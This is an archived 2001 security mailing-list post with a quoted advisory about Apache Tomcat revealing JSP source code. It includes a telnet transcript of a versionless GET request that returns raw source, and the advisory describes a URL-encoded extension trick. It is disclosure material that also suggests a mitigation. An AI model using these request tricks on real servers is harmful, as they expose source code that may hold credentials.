OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Eric Daniel Mauricio (ericmauBESTWAY.COM.BR)
Date: Tue Apr 03 2001 - 15:47:23 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    There is another way to get the source from a jsp page using Tomcat.

    If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
    you will get the source code and not the jsp processed.

    In other words, use Apache + Tomcat if you intend to protect your source code.

    telnet maq106 8080
    Trying 10.0.0.106...
    Connected to maq106
    Escape character is '^]'.
    GET /examples/jsp/num/numguess.jsp
    HTTP/1.0 200 OK
    Content-Type: text/plain
    Content-Length: 1237
    Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
    Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
    Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)

    <!--
      Copyright (c) 1999 The Apache Software Foundation. All rights
      reserved.

      Number Guess Game
      Written by Jason Hunter, CTO, K&A Software
      http://www.servlets.com
    -->

    <% page import = "num.NumberGuessBean" %>

    <jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
    <jsp:setProperty name="numguess" property="*"/>

    <html>
    <head><title>Number Guess</title></head>
    <body bgcolor="white">
    <font size=4>

    <% if (numguess.getSuccess()) { %>

      Congratulations! You got it.
      And after just <%= numguess.getNumGuesses() %> tries.<p>

      <% numguess.reset(); %>

      Care to <a href="numguess.jsp">try again</a>?

    <% } else if (numguess.getNumGuesses() == 0) { %>

      Welcome to the Number Guess game.<p>

      I'm thinking of a number between 1 and 100.<p>

      <form method=get>
      What's your guess? <input type=text name=guess>
      <input type=submit value="Submit">
      </form>

    <% } else { %>

      Good guess, but nope. Try <b><%= numguess.getHint() %></b>.

      You have made <%= numguess.getNumGuesses() %> guesses.<p>

      I'm thinking of a number between 1 and 100.<p>

      <form method=get>
      What's your guess? <input type=text name=guess>
      <input type=submit value="Submit">
      </form>

    <% } %>

    </font>
    </body>
    </html>
    Connection closed by foreign host.

    [],

       ericmau

    "Sverre H. Huseby" <shhTHATHOST.COM> escreveu:

    > Tomcat may reveal script source code by URL trickery
    > ----------------------------------------------------
    >
    > Sverre H. Huseby advisory 2001-03-29
    >
    >
    >
    > Systems affected
    > ----------------
    >
    > Tomcat 4.0-b1 (latest milestone) and nighly build as of 2001-03-28
    > tested. Other versions may be vulnerable too. The problem is only
    > present when using Tomcat's built in web server, not when using Tomcat
    > with Apache Web Server.
    >
    >
    > Description
    > -----------
    >
    > Tomcat (http://jakarta.apache.org/tomcat/), the Reference
    > Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
    > Technologies, may be tricked into revealing the source code of JSP
    > scripts by using simple URL encoding.
    >
    >
    > Details
    > -------
    >
    > It seems that the built in web server in Tomcat does URL decoding in
    > an unreasonable order. URLs like the following
    >
    > http://XXX:8080/examples/jsp/num/numguess.js%70
    >
    > where %70 is an URL encoded 'p', returns the source code of index.jsp
    > rather than running the script on the server side.
    >
    > To speculate: The JSP handler is skipped as this URL does not end in
    > ".jsp", but the static file handler is nevertheless able to map the
    > URL into a correct file name.
    >
    >
    > Impact
    > ------
    >
    > This design error makes it possible to fetch the source code of JSP
    > scripts. Such source code may contain database passwords and file
    > names, and may reveal design errors or programming bugs that make it
    > possible to further exploit the server or service.
    >
    >
    >
    > Reported by Sverre H. Huseby, shhthathost.com
    >
    > --
    > <URL:mailto:shhthathost.com>
    > <URL:http://shh.thathost.com/>
    >